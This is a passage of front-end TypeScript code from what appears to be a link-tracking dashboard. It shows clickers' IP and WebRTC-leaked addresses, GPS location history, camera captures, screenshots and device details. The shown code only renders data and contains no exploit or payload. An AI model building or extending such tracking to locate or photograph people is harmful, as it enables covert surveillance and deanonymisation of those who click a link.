      ipAddress: row.ipAddress || '',
      userAgent: row.userAgent || '',
      source: row.source ?? '',
      referrer: row.referrer ?? '',
      ipCountry: row.ipCountry ?? '',
    };
    this.dialog.open(BotInfoDialogComponent, {
      data,
      panelClass: 'bot-info-dialog-panel',
      maxWidth: '560px',
      width: '95vw',
    });
  }

  onTimestampClick(row: VisitorInteractionRow) {
    if (row.isPreviewFetch) return;
    const click = row as RecentClickRow;
    const baseData = this.buildClickDetailsData(click);
    const clickId = click.raw?.id;

    // Open dialog immediately with base data so it appears without waiting for the API
    const dataUpdates$ = this.alias && this.accessCode && clickId ? new Subject<any>() : undefined;
    const dialogData = dataUpdates$ ? { ...baseData, dataUpdates$ } : baseData;
    this.openClickDetailsDialog(dialogData);

    if (dataUpdates$) {
      this.trackingLinksService
        .getClickDetails(this.alias!, clickId!, this.accessCode!)
        .subscribe({
          next: (api: ClickDetailsResponse) => {
            dataUpdates$.next(this.mergeClickDetailsData(baseData, api));
            dataUpdates$.complete();
          },
          error: () => {
            dataUpdates$.complete();
          },
        });
    }
  }

  private openClickDetailsDialog(data: any) {
    this.dialog.open(ClickDetailsDialogComponent, {
      data,
      panelClass: 'click-details-dialog-panel',
      backdropClass: 'click-details-dialog-backdrop',
      maxWidth: '1000px',
      width: '95vw',
      maxHeight: 'calc(100vh - 72px)',
      enterAnimationDuration: 150,
      exitAnimationDuration: 100,
    });
  }

  private mergeClickDetailsData(base: any, api: ClickDetailsResponse): any {
    const mergedLocationHistory = Array.isArray(api.locationHistory)
      ? api.locationHistory
      : (base.locationHistory ?? []);
    const latestPoint = this.getLatestLocationPoint(mergedLocationHistory);
    return {
      ...base,
      timestamp: this.formatPreviewTimestamp(api.timestamp),
      ipAddress: api.ipAddress,
      serverIp: api.ipAddress,
      locationHistory: mergedLocationHistory,
      latitude: latestPoint?.latitude ?? base.latitude,
      longitude: latestPoint?.longitude ?? base.longitude,
      gpsAccuracy: latestPoint?.accuracy ?? api.gpsAccuracy ?? base.gpsAccuracy,
      ipCountry: api.ipCountry ?? base.ipCountry,
      ipRegion: api.ipRegion ?? base.ipRegion,
      ipCity: api.ipCity ?? base.ipCity,
      ipLatitude: api.ipLatitude ?? base.ipLatitude,
      ipLongitude: api.ipLongitude ?? base.ipLongitude,
      ipOrg: api.ipOrg ?? base.ipOrg,
      userAgent: api.userAgent ?? base.userAgent,
      deviceType: api.deviceType ?? base.deviceType,
      referrer: api.referrer ?? base.referrer,
      screenshot: api.screenshot ?? null,
      cameraCaptures: Array.isArray(api.cameraPhotos) ? api.cameraPhotos : (base.cameraCaptures ?? []),
    };
  }

  private buildClickDetailsData(row: RecentClickRow): any {
    if (row.raw) {
      const c = row.raw;
      const latestPoint = this.getLatestLocationPoint(c.locationHistory);
      const batteryPct = (c as { batteryLevel?: number }).batteryLevel;
      const batteryStr =
        batteryPct != null
          ? `${Math.round(batteryPct * 100)}%${(c as { batteryCharging?: boolean }).batteryCharging ? ' (Charging)' : ''}`
          : '—';
      return {
        ...row,
        serverIp: c.ipAddress,
        webrtcIps: (c['webrtcIPsPublic'] ?? c['webrtcIPsAll']) ?? [],
        batteryStatus: batteryStr,
        timeOnPage: c.timeOnPage != null ? `${(c.timeOnPage / 1000).toFixed(1)}s` : '—',
        scrollDepth: c.scrollDepth != null ? `${c.scrollDepth}%` : '—',
        locationGranted: row.hasGps,
        cameraGranted: row.photosCount > 0,
        cpuCores: (c as { cores?: number }).cores ?? undefined,
        touchPoints: (c as { maxTouchPoints?: number }).maxTouchPoints ?? undefined,
        locationHistory: c.locationHistory ?? [],
        gpsLatitude: c.gpsLatitude,
        gpsLongitude: c.gpsLongitude,
        gpsAltitude: c['gpsAltitude'],
        gpsSpeed: c['gpsSpeed'],
        gpsHeading: c['gpsHeading'],
        latitude: latestPoint?.latitude ?? c.gpsLatitude ?? undefined,
        longitude: latestPoint?.longitude ?? c.gpsLongitude ?? undefined,
        gpsAccuracy:
          latestPoint?.accuracy != null
            ? String(latestPoint.accuracy)
            : c.gpsAccuracy != null
              ? String(c.gpsAccuracy)
              : undefined,
        ipCountry: (c as { ipCountry?: string }).ipCountry ?? 'Unknown',
        ipRegion: (c as { ipRegion?: string }).ipRegion ?? 'Unknown',
        ipCity: (c as { ipCity?: string }).ipCity ?? 'Unknown',
        ipLatitude: (c as { ipLatitude?: number }).ipLatitude,
        ipLongitude: (c as { ipLongitude?: number }).ipLongitude,
        ipOrg: (c as { ipOrg?: string }).ipOrg,
        browser: c.browser,
        os: c.os,
        deviceType: c.deviceType,
        userAgent: c.userAgent,
        cameraCaptures: [],
      };
    }
    const [browser = 'Chrome', os = 'Windows'] = row.device.split(' / ');
    return {
      ...row,
      serverIp: row.ipAddress,
      webrtcIps: undefined,
      batteryStatus: '—',
      timeOnPage: '—',
      scrollDepth: '—',
      locationGranted: row.hasGps,
      cameraGranted: row.photosCount > 0,
      browser,
      os,
      deviceType: 'desktop',
      userAgent: '',
      cameraCaptures: [],
    };
  }

  private getLatestLocationPoint(
    history?: Array<{
      latitude: number | null;
      longitude: number | null;
      accuracy?: number;
      altitude?: number;
      speed?: number;
      heading?: number;
      timestamp: string;
    }>
  ) {
    if (!Array.isArray(history) || history.length === 0) return null;
    return history[history.length - 1];
  }
}
